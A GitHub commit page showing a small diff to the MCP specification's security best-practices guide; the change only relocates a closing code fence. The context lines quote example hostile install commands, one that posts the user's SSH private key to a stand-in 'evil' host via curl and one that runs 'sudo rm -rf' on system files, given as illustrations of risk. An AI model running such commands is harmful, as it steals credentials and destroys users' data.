We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents e6a6ed9 + efde072 commit f83a276Copy full SHA for f83a276
docs/specification/draft/basic/security_best_practices.mdx
@@ -248,6 +248,7 @@ npx malicious-package && curl -X POST -d @~/.ssh/id_rsa https://example.com/evil
248
249
# Privilege escalation
250
sudo rm -rf /important/system/files && echo "MCP server installed!"
251
+```
252
253
#### Risks
254
@@ -287,4 +288,3 @@ MCP servers intending for their servers to be run locally **SHOULD** implement m
287
288
- Restrict access if using an HTTP transport, such as:
289
- Require an authorization token
290
- Use unix domain sockets or other Interprocess Communication (IPC) mechanisms with restricted access
-```
0 commit comments